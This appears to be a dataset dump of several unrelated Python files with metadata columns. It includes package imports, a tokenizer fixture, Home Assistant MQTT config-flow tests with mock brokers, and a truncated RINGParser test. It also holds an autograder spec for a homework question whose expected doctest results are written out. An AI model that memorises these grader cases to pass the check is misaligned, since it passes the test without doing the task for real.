| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
4b4224908ae525f2a12682e868b72a429fad4af4
| 42
|
py
|
Python
|
backend/src/session/src/google_oauth/__init__.py
|
parveenchahal/authonline.net
|
d9c25262705feb5820f63569e0dd3ab42c61199b
|
[
"Apache-2.0"
] | null | null | null |
backend/src/session/src/google_oauth/__init__.py
|
parveenchahal/authonline.net
|
d9c25262705feb5820f63569e0dd3ab42c61199b
|
[
"Apache-2.0"
] | 1
|
2022-02-27T12:27:57.000Z
|
2022-02-27T12:27:57.000Z
|
backend/src/session/src/google_oauth/__init__.py
|
parveenchahal/authonline.net
|
d9c25262705feb5820f63569e0dd3ab42c61199b
|
[
"Apache-2.0"
] | null | null | null |
from ._oauth_operations import GoogleOauth
| 42
| 42
| 0.904762
| 5
| 42
| 7.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 42
| 1
| 42
| 42
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4b810a505d7f76456f89ddc3761558a209896b7e
| 52
|
py
|
Python
|
utokenize/testdata/basic_multilevel.py
|
MaxTurchin/pycopy-lib
|
d7a69fc2a28031e2ca475c29239f715c1809d8cc
|
[
"PSF-2.0"
] | 126
|
2019-07-19T14:42:41.000Z
|
2022-03-21T22:22:19.000Z
|
utokenize/testdata/basic_multilevel.py
|
MaxTurchin/pycopy-lib
|
d7a69fc2a28031e2ca475c29239f715c1809d8cc
|
[
"PSF-2.0"
] | 38
|
2019-08-28T01:46:31.000Z
|
2022-03-17T05:46:51.000Z
|
utokenize/testdata/basic_multilevel.py
|
MaxTurchin/pycopy-lib
|
d7a69fc2a28031e2ca475c29239f715c1809d8cc
|
[
"PSF-2.0"
] | 55
|
2019-08-02T09:32:33.000Z
|
2021-12-22T11:25:51.000Z
|
# Tokenizer fixture: nested blocks producing multi-level INDENT/DEDENT tokens.
# NOTE(review): this appears to be test input for utokenize — the indentation
# structure (not the behavior) is what matters; confirm adding this comment
# does not perturb the expected token stream before keeping it.
def foo():
    if 1:
        if 2:
            pass
| 10.4
| 16
| 0.307692
| 7
| 52
| 2.285714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 0.596154
| 52
| 4
| 17
| 13
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0
| 0
| 0.25
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
29b6acac421dacea89b81b4e043fec7633dfe01e
| 42
|
py
|
Python
|
hn_rank/__init__.py
|
RhettTrickett/hacker-news-rank
|
58ec0d27c3f4fe04468b76257d1371383973241a
|
[
"MIT"
] | 6
|
2018-06-20T07:47:01.000Z
|
2021-06-22T06:17:59.000Z
|
hn_rank/__init__.py
|
RhettTrickett/hacker-news-rank
|
58ec0d27c3f4fe04468b76257d1371383973241a
|
[
"MIT"
] | 1
|
2018-08-07T07:06:45.000Z
|
2018-08-07T07:06:45.000Z
|
hn_rank/__init__.py
|
RhettTrickett/hacker-news-rank
|
58ec0d27c3f4fe04468b76257d1371383973241a
|
[
"MIT"
] | 2
|
2018-06-22T08:22:24.000Z
|
2018-08-03T16:39:48.000Z
|
from .core import rank_urls, rank_articles
| 42
| 42
| 0.857143
| 7
| 42
| 4.857143
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
29d8872c736a0dcda922161991ea9ae31d4acdcc
| 795
|
py
|
Python
|
hw/hw01/tests/q4c.py
|
surajrampure/data-94-sp21
|
074543103579c28d796c681f78f3c38449825328
|
[
"BSD-3-Clause"
] | 1
|
2020-11-21T09:42:52.000Z
|
2020-11-21T09:42:52.000Z
|
hw/hw01/tests/q4c.py
|
surajrampure/data-94-sp21
|
074543103579c28d796c681f78f3c38449825328
|
[
"BSD-3-Clause"
] | null | null | null |
hw/hw01/tests/q4c.py
|
surajrampure/data-94-sp21
|
074543103579c28d796c681f78f3c38449825328
|
[
"BSD-3-Clause"
] | null | null | null |
# OK-format autograder spec for question 4c (1 point): four visible doctest
# cases checking that is_valid_november_2020_sweden returns True only for the
# exact country string 'Sweden' paired with a well-formed November 2020 date —
# lowercase 'sweden', a malformed day ('2020-11-302'), and a 2019 date all fail.
test = { 'name': 'q4c',
         'points': 1,
         'suites': [ { 'cases': [ {'code': ">>> is_valid_november_2020_sweden('Sweden', '2020-11-04')\nTrue", 'hidden': False, 'locked': False},
                                  {'code': ">>> not is_valid_november_2020_sweden('sweden', '2020-11-04')\nTrue", 'hidden': False, 'locked': False},
                                  {'code': ">>> not is_valid_november_2020_sweden('Sweden', '2020-11-302')\nTrue", 'hidden': False, 'locked': False},
                                  {'code': ">>> not is_valid_november_2020_sweden('Sweden', '2019-11-24')\nTrue", 'hidden': False, 'locked': False}],
                       'scored': True,
                       'setup': '',
                       'teardown': '',
                       'type': 'doctest'}]}
| 72.272727
| 150
| 0.464151
| 76
| 795
| 4.644737
| 0.381579
| 0.07932
| 0.169972
| 0.215297
| 0.779037
| 0.70255
| 0.70255
| 0.70255
| 0.70255
| 0.70255
| 0
| 0.096045
| 0.332075
| 795
| 10
| 151
| 79.5
| 0.568738
| 0
| 0
| 0
| 0
| 0
| 0.481761
| 0.196226
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d9aab02e821fe150f86ce60a9dccf96ee23acedc
| 21,154
|
py
|
Python
|
tests/components/mqtt/test_config_flow.py
|
jaspervanheuven/core
|
58c00da8a046e65ec0744426b3e2aa613249e9d9
|
[
"Apache-2.0"
] | 3
|
2020-11-27T06:26:27.000Z
|
2020-12-09T14:55:16.000Z
|
tests/components/mqtt/test_config_flow.py
|
jaspervanheuven/core
|
58c00da8a046e65ec0744426b3e2aa613249e9d9
|
[
"Apache-2.0"
] | 13
|
2021-12-16T06:18:53.000Z
|
2022-03-31T06:26:03.000Z
|
tests/components/mqtt/test_config_flow.py
|
jaspervanheuven/core
|
58c00da8a046e65ec0744426b3e2aa613249e9d9
|
[
"Apache-2.0"
] | 1
|
2020-12-09T14:55:21.000Z
|
2020-12-09T14:55:21.000Z
|
"""Test config flow."""
from unittest.mock import patch
import pytest
import voluptuous as vol
from homeassistant import config_entries, data_entry_flow
from homeassistant.components import mqtt
from homeassistant.components.hassio import HassioServiceInfo
from homeassistant.core import HomeAssistant
from homeassistant.setup import async_setup_component
from tests.common import MockConfigEntry
@pytest.fixture(autouse=True)
def mock_finish_setup():
    """Patch MQTT.async_connect so setup always succeeds without a broker."""
    target = "homeassistant.components.mqtt.MQTT.async_connect"
    with patch(target, return_value=True) as mock_finish:
        yield mock_finish
@pytest.fixture
def mock_try_connection():
    """Replace config_flow.try_connection with a mock and yield it."""
    patch_target = "homeassistant.components.mqtt.config_flow.try_connection"
    with patch(patch_target) as mock_try:
        yield mock_try
@pytest.fixture
def mock_try_connection_success():
    """Mock the try connection method with success."""
    def loop_start():
        """Simulate connect on loop start."""
        # Late-bound closure: mock_client is assigned by the `with` block
        # below before paho ever invokes loop_start, so firing on_connect
        # with rc=0 here simulates a successful broker handshake.
        mock_client().on_connect(mock_client, None, None, 0)
    with patch("paho.mqtt.client.Client") as mock_client:
        mock_client().loop_start = loop_start
        yield mock_client()
@pytest.fixture
def mock_try_connection_time_out():
    """Mock the try connection method with a time out."""
    # Patch prevent waiting 5 sec for a timeout
    # loop_start is replaced with a no-op lambda so on_connect never fires,
    # and MQTT_TIMEOUT is forced to 0 so the flow gives up immediately.
    with patch("paho.mqtt.client.Client") as mock_client, patch(
        "homeassistant.components.mqtt.config_flow.MQTT_TIMEOUT", 0
    ):
        mock_client().loop_start = lambda *args: 1
        yield mock_client()
async def test_user_connection_works(
    hass, mock_try_connection, mock_finish_setup, mqtt_client_mock
):
    """Test we can finish a config flow."""
    # Pretend the broker is reachable.
    mock_try_connection.return_value = True
    result = await hass.config_entries.flow.async_init(
        "mqtt", context={"source": config_entries.SOURCE_USER}
    )
    assert result["type"] == "form"
    # Submitting a broker address completes the flow and creates the entry
    # with default port 1883 and discovery enabled.
    result = await hass.config_entries.flow.async_configure(
        result["flow_id"], {"broker": "127.0.0.1"}
    )
    assert result["type"] == "create_entry"
    assert result["result"].data == {
        "broker": "127.0.0.1",
        "port": 1883,
        "discovery": True,
    }
    # Check we tried the connection
    assert len(mock_try_connection.mock_calls) == 1
    # Check config entry got setup
    assert len(mock_finish_setup.mock_calls) == 1
async def test_user_connection_fails(
    hass, mock_try_connection_time_out, mock_finish_setup
):
    """Test if connection cannot be made."""
    result = await hass.config_entries.flow.async_init(
        "mqtt", context={"source": config_entries.SOURCE_USER}
    )
    assert result["type"] == "form"
    # The timed-out broker check must re-show the form with an error
    # instead of creating an entry.
    result = await hass.config_entries.flow.async_configure(
        result["flow_id"], {"broker": "127.0.0.1"}
    )
    assert result["type"] == "form"
    assert result["errors"]["base"] == "cannot_connect"
    # Check we tried the connection
    assert len(mock_try_connection_time_out.mock_calls)
    # Check config entry did not setup
    assert len(mock_finish_setup.mock_calls) == 0
async def test_manual_config_starts_discovery_flow(
    hass, mock_try_connection, mock_finish_setup, mqtt_client_mock
):
    """Test manual config initiates a discovery flow."""
    # No flows in progress
    assert hass.config_entries.flow.async_progress() == []
    # MQTT config present in yaml config
    assert await async_setup_component(hass, "mqtt", {"mqtt": {}})
    await hass.async_block_till_done()
    assert len(mock_finish_setup.mock_calls) == 0
    # There should now be a discovery flow
    # YAML-only config must not set up the integration directly; it is
    # expected to spawn an integration_discovery flow parked on "broker".
    flows = hass.config_entries.flow.async_progress()
    assert len(flows) == 1
    assert flows[0]["context"]["source"] == "integration_discovery"
    assert flows[0]["handler"] == "mqtt"
    assert flows[0]["step_id"] == "broker"
async def test_manual_config_set(
    hass, mock_try_connection, mock_finish_setup, mqtt_client_mock
):
    """Test manual config does not create an entry, and entry can be setup late."""
    # MQTT config present in yaml config
    assert await async_setup_component(hass, "mqtt", {"mqtt": {"broker": "bla"}})
    await hass.async_block_till_done()
    assert len(mock_finish_setup.mock_calls) == 0
    mock_try_connection.return_value = True
    # Start config flow
    result = await hass.config_entries.flow.async_init(
        "mqtt", context={"source": config_entries.SOURCE_USER}
    )
    assert result["type"] == "form"
    # Entering a broker in the UI overrides the YAML broker "bla".
    result = await hass.config_entries.flow.async_configure(
        result["flow_id"], {"broker": "127.0.0.1"}
    )
    assert result["type"] == "create_entry"
    assert result["result"].data == {
        "broker": "127.0.0.1",
        "port": 1883,
        "discovery": True,
    }
    # Check we tried the connection, with precedence for config entry settings
    mock_try_connection.assert_called_once_with("127.0.0.1", 1883, None, None)
    # Check config entry got setup
    assert len(mock_finish_setup.mock_calls) == 1
async def test_user_single_instance(hass):
    """A second user-initiated flow must abort: mqtt allows one entry only."""
    MockConfigEntry(domain="mqtt").add_to_hass(hass)
    flow_result = await hass.config_entries.flow.async_init(
        "mqtt", context={"source": config_entries.SOURCE_USER}
    )
    assert flow_result["type"] == "abort"
    assert flow_result["reason"] == "single_instance_allowed"
async def test_hassio_already_configured(hass):
    """A supervisor-initiated flow must abort when an entry already exists."""
    MockConfigEntry(domain="mqtt").add_to_hass(hass)
    flow_result = await hass.config_entries.flow.async_init(
        "mqtt", context={"source": config_entries.SOURCE_HASSIO}
    )
    assert flow_result["type"] == "abort"
    assert flow_result["reason"] == "already_configured"
async def test_hassio_ignored(hass: HomeAssistant) -> None:
    """Test we supervisor discovered instance can be ignored."""
    # A previously user-ignored entry must make supervisor discovery abort.
    MockConfigEntry(
        domain=mqtt.DOMAIN, source=config_entries.SOURCE_IGNORE
    ).add_to_hass(hass)
    result = await hass.config_entries.flow.async_init(
        mqtt.DOMAIN,
        data=HassioServiceInfo(
            config={
                "addon": "Mosquitto",
                "host": "mock-mosquitto",
                "port": "1883",
                "protocol": "3.1.1",
            }
        ),
        context={"source": config_entries.SOURCE_HASSIO},
    )
    assert result
    assert result.get("type") == data_entry_flow.RESULT_TYPE_ABORT
    assert result.get("reason") == "already_configured"
async def test_hassio_confirm(hass, mock_try_connection_success, mock_finish_setup):
    """Test we can finish a config flow started by supervisor discovery.

    Fix: the old first line set ``return_value`` on the module-level
    ``mock_try_connection`` fixture *function* (it is not a parameter of
    this test), which had no effect on the flow and leaked an attribute
    onto the function object across tests — removed.
    """
    result = await hass.config_entries.flow.async_init(
        "mqtt",
        data=HassioServiceInfo(
            config={
                "addon": "Mock Addon",
                "host": "mock-broker",
                "port": 1883,
                "username": "mock-user",
                "password": "mock-pass",
                "protocol": "3.1.1",
            }
        ),
        context={"source": config_entries.SOURCE_HASSIO},
    )
    assert result["type"] == "form"
    assert result["step_id"] == "hassio_confirm"
    assert result["description_placeholders"] == {"addon": "Mock Addon"}
    mock_try_connection_success.reset_mock()
    # Confirming with discovery enabled should create the entry from the
    # supervisor-provided connection details.
    result = await hass.config_entries.flow.async_configure(
        result["flow_id"], {"discovery": True}
    )
    assert result["type"] == "create_entry"
    assert result["result"].data == {
        "broker": "mock-broker",
        "port": 1883,
        "username": "mock-user",
        "password": "mock-pass",
        "protocol": "3.1.1",
        "discovery": True,
    }
    # Check we tried the connection
    assert len(mock_try_connection_success.mock_calls)
    # Check config entry got setup
    assert len(mock_finish_setup.mock_calls) == 1
async def test_option_flow(hass, mqtt_mock, mock_try_connection):
    """Test config flow options."""
    mock_try_connection.return_value = True
    config_entry = hass.config_entries.async_entries(mqtt.DOMAIN)[0]
    config_entry.data = {
        mqtt.CONF_BROKER: "test-broker",
        mqtt.CONF_PORT: 1234,
    }
    mqtt_mock.async_connect.reset_mock()
    # Step 1: broker settings.
    result = await hass.config_entries.options.async_init(config_entry.entry_id)
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "broker"
    result = await hass.config_entries.options.async_configure(
        result["flow_id"],
        user_input={
            mqtt.CONF_BROKER: "another-broker",
            mqtt.CONF_PORT: 2345,
            mqtt.CONF_USERNAME: "user",
            mqtt.CONF_PASSWORD: "pass",
        },
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "options"
    # No reconnect yet — only after the whole flow finishes.
    await hass.async_block_till_done()
    assert mqtt_mock.async_connect.call_count == 0
    # Step 2: discovery plus birth/will message fields.
    result = await hass.config_entries.options.async_configure(
        result["flow_id"],
        user_input={
            mqtt.CONF_DISCOVERY: True,
            "birth_enable": True,
            "birth_topic": "ha_state/online",
            "birth_payload": "online",
            "birth_qos": 1,
            "birth_retain": True,
            "will_enable": True,
            "will_topic": "ha_state/offline",
            "will_payload": "offline",
            "will_qos": 2,
            "will_retain": True,
        },
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
    assert result["data"] is None
    # The flat birth_*/will_* form fields are folded into nested
    # CONF_BIRTH_MESSAGE / CONF_WILL_MESSAGE dicts on the entry.
    assert config_entry.data == {
        mqtt.CONF_BROKER: "another-broker",
        mqtt.CONF_PORT: 2345,
        mqtt.CONF_USERNAME: "user",
        mqtt.CONF_PASSWORD: "pass",
        mqtt.CONF_DISCOVERY: True,
        mqtt.CONF_BIRTH_MESSAGE: {
            mqtt.ATTR_TOPIC: "ha_state/online",
            mqtt.ATTR_PAYLOAD: "online",
            mqtt.ATTR_QOS: 1,
            mqtt.ATTR_RETAIN: True,
        },
        mqtt.CONF_WILL_MESSAGE: {
            mqtt.ATTR_TOPIC: "ha_state/offline",
            mqtt.ATTR_PAYLOAD: "offline",
            mqtt.ATTR_QOS: 2,
            mqtt.ATTR_RETAIN: True,
        },
    }
    # Completing the options flow triggers exactly one reconnect.
    await hass.async_block_till_done()
    assert mqtt_mock.async_connect.call_count == 1
async def test_disable_birth_will(hass, mqtt_mock, mock_try_connection):
    """Test disabling birth and will."""
    mock_try_connection.return_value = True
    config_entry = hass.config_entries.async_entries(mqtt.DOMAIN)[0]
    config_entry.data = {
        mqtt.CONF_BROKER: "test-broker",
        mqtt.CONF_PORT: 1234,
    }
    mqtt_mock.async_connect.reset_mock()
    # Step 1: broker settings.
    result = await hass.config_entries.options.async_init(config_entry.entry_id)
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "broker"
    result = await hass.config_entries.options.async_configure(
        result["flow_id"],
        user_input={
            mqtt.CONF_BROKER: "another-broker",
            mqtt.CONF_PORT: 2345,
            mqtt.CONF_USERNAME: "user",
            mqtt.CONF_PASSWORD: "pass",
        },
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "options"
    await hass.async_block_till_done()
    assert mqtt_mock.async_connect.call_count == 0
    # Step 2: birth_enable/will_enable are False even though topic/payload
    # fields are filled in — the disabled flag must win.
    result = await hass.config_entries.options.async_configure(
        result["flow_id"],
        user_input={
            mqtt.CONF_DISCOVERY: True,
            "birth_enable": False,
            "birth_topic": "ha_state/online",
            "birth_payload": "online",
            "birth_qos": 1,
            "birth_retain": True,
            "will_enable": False,
            "will_topic": "ha_state/offline",
            "will_payload": "offline",
            "will_qos": 2,
            "will_retain": True,
        },
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
    assert result["data"] is None
    # Disabled birth/will end up as empty dicts on the entry.
    assert config_entry.data == {
        mqtt.CONF_BROKER: "another-broker",
        mqtt.CONF_PORT: 2345,
        mqtt.CONF_USERNAME: "user",
        mqtt.CONF_PASSWORD: "pass",
        mqtt.CONF_DISCOVERY: True,
        mqtt.CONF_BIRTH_MESSAGE: {},
        mqtt.CONF_WILL_MESSAGE: {},
    }
    await hass.async_block_till_done()
    assert mqtt_mock.async_connect.call_count == 1
def get_default(schema, key):
    """Return *key*'s default from a voluptuous schema, or None.

    None is returned both when the key is absent and when its default
    is vol.UNDEFINED.
    """
    for marker in schema.keys():
        if marker != key:
            continue
        if marker.default == vol.UNDEFINED:
            return None
        return marker.default()
def get_suggested(schema, key):
    """Return *key*'s suggested_value from a voluptuous schema, or None.

    None is returned when the key is absent, has no description, or its
    description lacks a "suggested_value" entry.
    """
    for marker in schema.keys():
        if marker != key:
            continue
        description = marker.description
        if description and "suggested_value" in description:
            return description["suggested_value"]
        return None
async def test_option_flow_default_suggested_values(
    hass, mqtt_mock, mock_try_connection_success
):
    """Test config flow options has default/suggested values.

    Seeds the config entry, then verifies that persisted data is fed back
    into the options forms: broker/port and qos/retain/discovery as schema
    defaults, credentials and birth/will topics/payloads as suggested
    values.  Runs the flow twice to confirm the second pass reflects the
    values saved by the first.
    """
    config_entry = hass.config_entries.async_entries(mqtt.DOMAIN)[0]
    # Seed the entry with a full configuration so every form field has a
    # stored value to surface.
    config_entry.data = {
        mqtt.CONF_BROKER: "test-broker",
        mqtt.CONF_PORT: 1234,
        mqtt.CONF_USERNAME: "user",
        mqtt.CONF_PASSWORD: "pass",
        mqtt.CONF_DISCOVERY: True,
        mqtt.CONF_BIRTH_MESSAGE: {
            mqtt.ATTR_TOPIC: "ha_state/online",
            mqtt.ATTR_PAYLOAD: "online",
            mqtt.ATTR_QOS: 1,
            mqtt.ATTR_RETAIN: True,
        },
        mqtt.CONF_WILL_MESSAGE: {
            mqtt.ATTR_TOPIC: "ha_state/offline",
            mqtt.ATTR_PAYLOAD: "offline",
            mqtt.ATTR_QOS: 2,
            mqtt.ATTR_RETAIN: False,
        },
    }
    # Test default/suggested values from config
    result = await hass.config_entries.options.async_init(config_entry.entry_id)
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "broker"
    defaults = {
        mqtt.CONF_BROKER: "test-broker",
        mqtt.CONF_PORT: 1234,
    }
    suggested = {
        mqtt.CONF_USERNAME: "user",
        mqtt.CONF_PASSWORD: "pass",
    }
    for k, v in defaults.items():
        assert get_default(result["data_schema"].schema, k) == v
    for k, v in suggested.items():
        assert get_suggested(result["data_schema"].schema, k) == v
    # Submit new broker settings to advance to the options step.
    result = await hass.config_entries.options.async_configure(
        result["flow_id"],
        user_input={
            mqtt.CONF_BROKER: "another-broker",
            mqtt.CONF_PORT: 2345,
            mqtt.CONF_USERNAME: "us3r",
            mqtt.CONF_PASSWORD: "p4ss",
        },
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "options"
    defaults = {
        mqtt.CONF_DISCOVERY: True,
        "birth_qos": 1,
        "birth_retain": True,
        "will_qos": 2,
        "will_retain": False,
    }
    suggested = {
        "birth_topic": "ha_state/online",
        "birth_payload": "online",
        "will_topic": "ha_state/offline",
        "will_payload": "offline",
    }
    for k, v in defaults.items():
        assert get_default(result["data_schema"].schema, k) == v
    for k, v in suggested.items():
        assert get_suggested(result["data_schema"].schema, k) == v
    # Submit changed birth/will options; the flow should finish.
    result = await hass.config_entries.options.async_configure(
        result["flow_id"],
        user_input={
            mqtt.CONF_DISCOVERY: False,
            "birth_topic": "ha_state/onl1ne",
            "birth_payload": "onl1ne",
            "birth_qos": 2,
            "birth_retain": False,
            "will_topic": "ha_state/offl1ne",
            "will_payload": "offl1ne",
            "will_qos": 1,
            "will_retain": True,
        },
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
    # Test updated default/suggested values from config
    # (second pass: values saved above must now come back as defaults)
    result = await hass.config_entries.options.async_init(config_entry.entry_id)
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "broker"
    defaults = {
        mqtt.CONF_BROKER: "another-broker",
        mqtt.CONF_PORT: 2345,
    }
    suggested = {
        mqtt.CONF_USERNAME: "us3r",
        mqtt.CONF_PASSWORD: "p4ss",
    }
    for k, v in defaults.items():
        assert get_default(result["data_schema"].schema, k) == v
    for k, v in suggested.items():
        assert get_suggested(result["data_schema"].schema, k) == v
    result = await hass.config_entries.options.async_configure(
        result["flow_id"],
        user_input={mqtt.CONF_BROKER: "another-broker", mqtt.CONF_PORT: 2345},
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "options"
    defaults = {
        mqtt.CONF_DISCOVERY: False,
        "birth_qos": 2,
        "birth_retain": False,
        "will_qos": 1,
        "will_retain": True,
    }
    suggested = {
        "birth_topic": "ha_state/onl1ne",
        "birth_payload": "onl1ne",
        "will_topic": "ha_state/offl1ne",
        "will_payload": "offl1ne",
    }
    for k, v in defaults.items():
        assert get_default(result["data_schema"].schema, k) == v
    for k, v in suggested.items():
        assert get_suggested(result["data_schema"].schema, k) == v
    result = await hass.config_entries.options.async_configure(
        result["flow_id"],
        user_input={
            mqtt.CONF_DISCOVERY: True,
            "birth_topic": "ha_state/onl1ne",
            "birth_payload": "onl1ne",
            "birth_qos": 2,
            "birth_retain": False,
            "will_topic": "ha_state/offl1ne",
            "will_payload": "offl1ne",
            "will_qos": 1,
            "will_retain": True,
        },
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
    # Make sure all MQTT related jobs are done before ending the test
    await hass.async_block_till_done()
async def test_options_user_connection_fails(hass, mock_try_connection_time_out):
    """Test that a failed broker connection keeps the entry unchanged."""
    entry = MockConfigEntry(domain=mqtt.DOMAIN)
    entry.add_to_hass(hass)
    entry.data = {mqtt.CONF_BROKER: "test-broker", mqtt.CONF_PORT: 1234}

    step = await hass.config_entries.options.async_init(entry.entry_id)
    assert step["type"] == "form"

    mock_try_connection_time_out.reset_mock()
    step = await hass.config_entries.options.async_configure(
        step["flow_id"],
        user_input={mqtt.CONF_BROKER: "bad-broker", mqtt.CONF_PORT: 2345},
    )
    # The broker form is shown again with a connection error.
    assert step["type"] == "form"
    assert step["errors"]["base"] == "cannot_connect"
    # Check we tried the connection
    assert len(mock_try_connection_time_out.mock_calls)
    # Check config entry did not update
    assert entry.data == {mqtt.CONF_BROKER: "test-broker", mqtt.CONF_PORT: 1234}
async def test_options_bad_birth_message_fails(hass, mock_try_connection):
    """Test that an invalid birth topic is rejected on the options step."""
    entry = MockConfigEntry(domain=mqtt.DOMAIN)
    entry.add_to_hass(hass)
    entry.data = {mqtt.CONF_BROKER: "test-broker", mqtt.CONF_PORT: 1234}
    mock_try_connection.return_value = True

    step = await hass.config_entries.options.async_init(entry.entry_id)
    assert step["type"] == "form"

    step = await hass.config_entries.options.async_configure(
        step["flow_id"],
        user_input={mqtt.CONF_BROKER: "another-broker", mqtt.CONF_PORT: 2345},
    )
    assert step["type"] == "form"
    assert step["step_id"] == "options"

    # A wildcard ('#') in the birth topic must fail validation.
    step = await hass.config_entries.options.async_configure(
        step["flow_id"],
        user_input={"birth_topic": "ha_state/online/#"},
    )
    assert step["type"] == "form"
    assert step["errors"]["base"] == "bad_birth"
    # Check config entry did not update
    assert entry.data == {mqtt.CONF_BROKER: "test-broker", mqtt.CONF_PORT: 1234}
async def test_options_bad_will_message_fails(hass, mock_try_connection):
    """Test that an invalid will topic is rejected on the options step."""
    entry = MockConfigEntry(domain=mqtt.DOMAIN)
    entry.add_to_hass(hass)
    entry.data = {mqtt.CONF_BROKER: "test-broker", mqtt.CONF_PORT: 1234}
    mock_try_connection.return_value = True

    step = await hass.config_entries.options.async_init(entry.entry_id)
    assert step["type"] == "form"

    step = await hass.config_entries.options.async_configure(
        step["flow_id"],
        user_input={mqtt.CONF_BROKER: "another-broker", mqtt.CONF_PORT: 2345},
    )
    assert step["type"] == "form"
    assert step["step_id"] == "options"

    # A wildcard ('#') in the will topic must fail validation.
    step = await hass.config_entries.options.async_configure(
        step["flow_id"],
        user_input={"will_topic": "ha_state/offline/#"},
    )
    assert step["type"] == "form"
    assert step["errors"]["base"] == "bad_will"
    # Check config entry did not update
    assert entry.data == {mqtt.CONF_BROKER: "test-broker", mqtt.CONF_PORT: 1234}
| 32.796899
| 87
| 0.639217
| 2,603
| 21,154
| 4.934307
| 0.080292
| 0.044223
| 0.047649
| 0.050685
| 0.837667
| 0.813999
| 0.768608
| 0.748832
| 0.716988
| 0.689583
| 0
| 0.012625
| 0.239907
| 21,154
| 644
| 88
| 32.847826
| 0.786181
| 0.050392
| 0
| 0.693837
| 0
| 0
| 0.145037
| 0.014019
| 0
| 0
| 0
| 0
| 0.180915
| 1
| 0.013917
| false
| 0.019881
| 0.017893
| 0
| 0.039761
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8a4f64a79aa752959f3d9d5cee719ec3631adea7
| 12,902
|
py
|
Python
|
pgradd/tests/test_RINGparser_RDkitwrapper_test.py
|
VlachosGroup/PythonGroupAdditivity
|
114218addd528ebec82655edf4ca0d2d125d3543
|
[
"MIT"
] | 2
|
2019-09-20T22:02:52.000Z
|
2022-03-07T10:53:20.000Z
|
pgradd/tests/test_RINGparser_RDkitwrapper_test.py
|
VlachosGroup/PythonGroupAdditivity
|
114218addd528ebec82655edf4ca0d2d125d3543
|
[
"MIT"
] | 10
|
2019-06-12T18:31:48.000Z
|
2021-11-17T17:53:57.000Z
|
pgradd/tests/test_RINGparser_RDkitwrapper_test.py
|
VlachosGroup/PythonGroupAdditivity
|
114218addd528ebec82655edf4ca0d2d125d3543
|
[
"MIT"
] | 2
|
2019-11-20T10:29:02.000Z
|
2020-06-02T08:08:18.000Z
|
# -*- coding: utf-8 -*-
from pgradd.RINGParser.Reader import Read
from rdkit import Chem
import unittest
class TestRINGParser(unittest.TestCase):
    """Exercise the RING fragment-query language against RDKit molecules.

    Pattern of every test: build a molecule from SMILES, parse a RING
    fragment description with ``Read``, and compare the atom-index tuples
    returned by ``GetQueryMatches`` against the expected matches (order
    independent via ``sorted``).
    """
    def test_molquery(self):
        """Single-bond C-C query on 'CCC' matches both bonds, both directions."""
        testmol = Chem.MolFromSmiles('CCC')
        s = """
        fragment a{
